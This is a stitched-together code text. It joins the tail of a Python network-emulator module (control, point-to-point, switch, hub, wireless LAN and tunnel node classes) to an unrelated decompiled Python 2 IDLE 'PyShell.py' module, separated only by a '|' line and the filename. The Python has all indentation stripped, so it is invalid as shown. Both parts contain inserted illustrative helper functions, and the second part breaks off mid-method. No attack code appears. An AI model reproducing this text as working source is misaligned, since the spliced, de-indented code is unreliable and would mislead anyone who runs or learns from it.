localip=localip,
ttl=self.ttl,
mtu=self.mtu,
)
self.startup()
self.attach(self.gretap)
def setkey(self, key: int, iface_data: InterfaceData) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:param iface_data: interface data for setting up tunnel key
:return: nothing
"""
self.grekey = key
ips = iface_data.get_ips()
if ips:
self.add_ips(ips)
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
# base control interface index
CTRLIF_IDX_BASE: int = 99
DEFAULT_PREFIX_LIST: List[str] = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
prefix: str,
_id: int = None,
name: str = None,
hostid: int = None,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: str = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
        :param name: node name
:param prefix: control network ipv4 prefix
:param hostid: host id
:param server: remote server node
will run on, default is None for localhost
:param assign_address: assigned address
:param updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix: netaddr.IPNetwork = netaddr.IPNetwork(prefix).cidr
self.hostid: Optional[int] = hostid
self.assign_address: bool = assign_address
self.updown_script: Optional[str] = updown_script
self.serverintf: Optional[str] = serverintf
super().__init__(session, _id, name, server)
def add_addresses(self, index: int) -> None:
"""
        Add addresses used for created control networks.
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.use_ovs()
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logger.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logger.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.set_iface_master(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_iface(self.brname, self.serverintf)
except CoreCommandError:
logger.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logger.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logger.exception("error issuing shutdown script shutdown")
super().shutdown()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param iface: network interface
:return: nothing
"""
if len(self.ifaces) >= 2:
raise CoreError("ptp links support at most 2 network interfaces")
super().attach(iface)
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self.ifaces) != 2:
return all_links
ifaces = self.get_ifaces()
iface1 = ifaces[0]
iface2 = ifaces[1]
unidirectional = 0 if iface1.local_options == iface2.local_options else 1
iface1_data = iface1.get_data()
iface2_data = iface2.get_data()
link_data = LinkData(
message_type=flags,
type=self.linktype,
node1_id=iface1.node.id,
node2_id=iface2.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=iface1.local_options,
)
link_data.options.unidirectional = unidirectional
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
link_data = LinkData(
message_type=MessageFlags.NONE,
type=self.linktype,
node1_id=iface2.node.id,
node2_id=iface1.node.id,
iface1=InterfaceData(id=iface2_data.id),
iface2=InterfaceData(id=iface1_data.id),
options=iface2.local_options,
)
link_data.options.unidirectional = unidirectional
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.SWITCH
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype: NodeTypes = NodeTypes.HUB
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "hub"
def startup(self) -> None:
"""
Startup for a hub node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.set_mac_learning(self.brname, LEARNING_DISABLED)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.WIRELESS_LAN
linktype: LinkTypes = LinkTypes.WIRED
policy: NetworkPolicy = NetworkPolicy.DROP
type: str = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
        :param server: remote server the node will run on, default is None for
            localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model: Optional[WirelessModel] = None
self.mobility: Optional[WayPointMobility] = None
def startup(self) -> None:
"""
        Startup for a wlan node; updates the nftables queue after normal startup.
:return: nothing
"""
super().startup()
nft_queue.update(self)
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface
:return: nothing
"""
super().attach(iface)
if self.model:
iface.poshook = self.model.position_callback
iface.setposition()
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logger.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS:
self.model = model(session=self.session, _id=self.id)
for iface in self.get_ifaces():
iface.poshook = self.model.position_callback
iface.setposition()
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise CoreError(f"no mobility set to update for node({self.name})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise CoreError(f"no model set to update for node({self.name})")
logger.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for iface in self.get_ifaces():
iface.setposition()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
links = super().links(flags)
if self.model:
links.extend(self.model.links(flags))
return links
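# Illustrative sketch (not part of CORE): how setmodel()/update_mobility() above
# are typically driven. The model objects and config keys shown here are
# placeholders; only the WlanNode API defined above is exercised.
def _configure_wlan_example(wlan: WlanNode, wireless_model, mobility_model) -> None:
    # a model whose config_type is RegisterTlvs.WIRELESS becomes wlan.model and
    # hooks position callbacks onto every attached interface
    wlan.setmodel(wireless_model, {"range": "275"})
    # a model whose config_type is RegisterTlvs.MOBILITY becomes wlan.mobility
    wlan.setmodel(mobility_model, {})
    wlan.update_mobility({"refresh_ms": "50"})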
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype: NodeTypes = NodeTypes.TUNNEL
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "tunnel"
|
PyShell.py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: PyShell.py
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print >> sys.__stderr__, "** IDLE can't import Tkinter. Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + '_'
HOST = '127.0.0.1'
PORT = 0
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno, file=None, line=None):
global warning_stream
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno, file=file, line=line))
except IOError:
pass
return
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = '\nWarning (from warnings module):\n'
s += ' File "%s", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += ' %s\n' % line
s += '%s: %s\n>>> ' % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None, orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
linecache.checkcache = extended_linecache_checkcache
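# Illustrative sketch (not part of the original IDLE source): the patched
# checkcache() above keeps shell pseudo-file entries alive across cache checks.
# The entry name and contents below are made up for demonstration; IDLE itself
# never calls this function.
def _linecache_patch_demo():
    linecache.cache['<pyshell#0>'] = (6, 0, ['x = 1\n'], '<pyshell#0>')
    linecache.checkcache()  # real files are revalidated as usual...
    return '<pyshell#0>' in linecache.cache  # ...but the <pyshell#...> entry survives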
class PyShellEditorWindow(EditorWindow):
"""Regular text edit window in IDLE, supports breakpoints"""
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind('<<set-breakpoint-here>>', self.set_breakpoint_here)
self.text.bind('<<clear-breakpoint-here>>', self.clear_breakpoint_here)
self.text.bind('<<open-python-shell>>', self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(), 'breakpoints.lst')
if self.io.filename:
self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook, self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
('Set Breakpoint', '<<set-breakpoint-here>>'),
('Clear Breakpoint', '<<clear-breakpoint-here>>')]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add('BREAK', '%d.0' % lineno, '%d.0' % (lineno + 1))
try:
i = self.breakpoints.index(lineno)
except ValueError:
self.breakpoints.append(lineno)
try:
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except:
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index('insert')))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index('insert')))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove('BREAK', 'insert linestart', 'insert lineend +1char')
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove('BREAK', '1.0', END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"""Save breakpoints when file is saved"""
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath, 'r').readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath, 'w')
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update()
filename = self.io.filename
if filename is None:
return
else:
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath, 'r').readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename) + 1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
return
def update_breakpoints(self):
"""Retrieves all the breakpoints in the current window"""
text = self.text
ranges = text.tag_ranges('BREAK')
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index + 1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
def _close(self):
"""Extend base method - clear breaks when module is closed"""
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"""Extend base class: IDLE supports a shell and breakpoints"""
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"""Extend base class: colorizer for the shell window itself"""
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove('TODO', '1.0', 'iomark')
self.tag_add('SYNC', '1.0', 'iomark')
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main', 'Theme', 'name')
self.tagdefs.update({'stdin': {'background': None,'foreground': None},'stdout': idleConf.GetHighlight(theme, 'stdout'),
'stderr': idleConf.GetHighlight(theme, 'stderr'),
'console': idleConf.GetHighlight(theme, 'console')
})
return
class ModifiedUndoDelegator(UndoDelegator):
"""Extend base class: forbid insert/delete before the I/O mark"""
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, '<', 'iomark'):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, '<', 'iomark'):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"""Override the base class - just re-raise EOFError"""
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
return
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
return
def build_subprocess_arglist(self):
w = [ '-W' + s for s in sys.warnoptions ]
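        # 1/2 > 0 is only true under new (true) division, i.e. when -Qnew is in
        # effect for this interpreter; if so, pass the flag on to the subprocess.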
if 1 / 2 > 0:
w.append('-Qnew')
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc', default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ['-c', command, str(self.port)]
def start_subprocess(self):
addr = (
HOST, self.port)
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error as err:
pass
else:
self.display_port_binding_error()
return None
self.port = self.rpcclt.listening_sock.getsockname()[1]
if PORT != 0:
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.rpcclt.register('stdin', self.tkconsole)
self.rpcclt.register('stdout', self.tkconsole.stdout)
self.rpcclt.register('stderr', self.tkconsole.stderr)
self.rpcclt.register('flist', self.tkconsole.flist)
self.rpcclt.register('linecache', linecache)
self.rpcclt.register('interp', self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
else:
self.restarting = True
debug = self.getdebugger()
if debug:
try:
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.transfer_path()
console.text.delete('iomark', 'end-1c')
if was_executing:
console.write('\n')
console.showprompt()
halfbar = (int(console.width) - 16) // 2 * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set('restart', 'end-1c')
console.text.mark_gravity('restart', 'left')
console.showprompt()
if debug:
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall('exec', 'interrupt_the_server', (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError:
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
return
def unix_terminate(self):
"""UNIX: make sure subprocess is terminated and collect status"""
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
return
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand('if 1:\n import sys as _sys\n _sys.path = %r\n del _sys\n \n' % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
else:
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == 'OK':
if what is not None:
print >> console, repr(what)
elif how == 'EXCEPTION':
if self.tkconsole.getvar('<<toggle-jit-stack-viewer>>'):
self.remote_stack_viewer()
elif how == 'ERROR':
errmsg = 'PyShell.ModifiedInterpreter: Subprocess ERROR:\n'
print >> sys.__stderr__, errmsg, what
print >> console, errmsg, what
try:
self.tkconsole.endexecuting()
except AttributeError:
pass
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval, self.poll_subprocess)
return
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue('exec', 'stackviewer', ('flist', ), {})
if oid is None:
self.tkconsole.root.bell()
return
else:
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main', 'Theme', 'name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill='both')
node = TreeNode(sc.canvas, None, item)
node.expand()
return
gid = 0
def execsource(self, source):
"""Like runsource() but assumes complete exec source"""
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"""Execute an existing file"""
if source is None:
source = open(filename, 'r').read()
try:
code = compile(source, filename, 'exec')
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print >> tkerr, '*** Error in script or command!\n'
print >> tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
return
def runsource(self, source):
"""Extend base class method: Stuff the source in the line cache first"""
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action='error', category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write('Unsupported characters in input\n')
return
try:
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
return
def stuffsource(self, source):
"""Stuff source in the filename cache"""
filename = '<pyshell#%d>' % self.gid
self.gid = self.gid + 1
lines = source.split('\n')
linecache.cache[filename] = (len(source) + 1, 0, lines, filename)
return filename
def prepend_syspath(self, filename):
"""Prepend sys.path with file's directory if not already included"""
self.runcommand('if 1:\n _filename = %r\n import sys as _sys\n from os.path import dirname as _dirname\n _dir = _dirname(_filename)\n if not _dir in _sys.path:\n _sys.path.insert(0, _dir)\n del _filename, _sys, _dirname, _dir\n \n' % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = 'iomark + %d chars' % (offset - 1)
else:
pos = 'iomark linestart + %d lines + %d chars' % (
lineno - 1, offset - 1)
text.tag_add('ERROR', pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add('ERROR', pos + ' wordstart', pos)
self.tkconsole.resetoutput()
self.write('SyntaxError: %s\n' % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return (msg, lineno, offset, line)
else:
return None
return None
def showtraceback(self):
"""Extend base class method to reset output properly"""
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar('<<toggle-jit-stack-viewer>>'):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != '<>':
del c[key]
def runcommand(self, code):
"""Run the code without invoking the debugger"""
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue('exec', 'runcode', (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"""Override base class method"""
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue('exec', 'runcode', (
code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno('Exit?', 'Do you want to exit altogether?', default='yes', master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >> self.tkconsole.stderr, 'IDLE internal error in runcode()'
self.showtraceback()
self.tkconsole.endexecuting()
elif self.tkconsole.canceled:
self.tkconsole.canceled = False
print >> self.tkconsole.stderr, 'KeyboardInterrupt'
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError:
pass
return
def write(self, s):
"""Override base class method"""
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror('Port Binding Error', "IDLE can't bind to a TCP/IP port, which is necessary to communicate with its Python execution server. This might be because no networking is installed on this computer. Run IDLE with the -n command line switch to start without a subprocess and refer to Help/IDLE Help 'Running without a subprocess' for further details.", master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror('Subprocess Startup Error', "IDLE's subprocess didn't make connection. Either IDLE can't start a subprocess or personal firewall software is blocking the connection.", master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror('Already executing', 'The Python Shell window is already executing a command; please wait until it is finished.', master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = 'Python Shell'
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
menu_specs = [
('file', '_File'),
('edit', '_Edit'),
('debug', '_Debug'),
('options', '_Options'),
('windows', '_Windows'),
('help', '_Help')]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ('windows', '_Window')
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != 'shell':
ms.insert(2, ('shell', 'She_ll'))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
self.indentwidth = 8
self.context_use_ps1 = True
text = self.text
text.configure(wrap='char')
text.bind('<<newline-and-indent>>', self.enter_callback)
text.bind('<<plain-newline-and-indent>>', self.linefeed_callback)
text.bind('<<interrupt-execution>>', self.cancel_callback)
text.bind('<<end-of-file>>', self.eof_callback)
text.bind('<<open-stack-viewer>>', self.open_stack_viewer)
text.bind('<<toggle-debugger>>', self.toggle_debugger)
text.bind('<<toggle-jit-stack-viewer>>', self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind('<<view-restart>>', self.view_restart_mark)
text.bind('<<restart-shell>>', self.restart_shell)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdout = PseudoFile(self, 'stdout', IOBinding.encoding)
self.stderr = PseudoFile(self, 'stderr', IOBinding.encoding)
self.console = PseudoFile(self, 'console', IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
self.history = self.History(self.text)
self.pollinterval = 50
return
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now", 'You can only toggle the debugger when idle', master=self.text)
self.set_debugger_indicator()
return 'break'
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar('<<toggle-debugger>>', not not db)
def toggle_jit_stack_viewer(self, event=None):
pass
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write('[DEBUG OFF]\n')
sys.ps1 = '>>> '
self.showprompt()
self.set_debugger_indicator()
return
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt, self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = '[DEBUG ON]\n>>> '
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"""Helper for ModifiedInterpreter"""
self.resetoutput()
self.executing = 1
def endexecuting(self):
"""Helper for ModifiedInterpreter"""
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"""Extend EditorWindow.close()"""
if self.executing:
response = tkMessageBox.askokcancel('Kill?', 'The program is still running!\n Do you want to kill it?', default='ok', parent=self.text)
if response is False:
return 'cancel'
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"""Extend EditorWindow._close(), shut down debugger and execution server"""
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
return
def ispythonsource(self, filename):
"""Override EditorWindow method: never remove the colorizer"""
return True
def short_title(self):
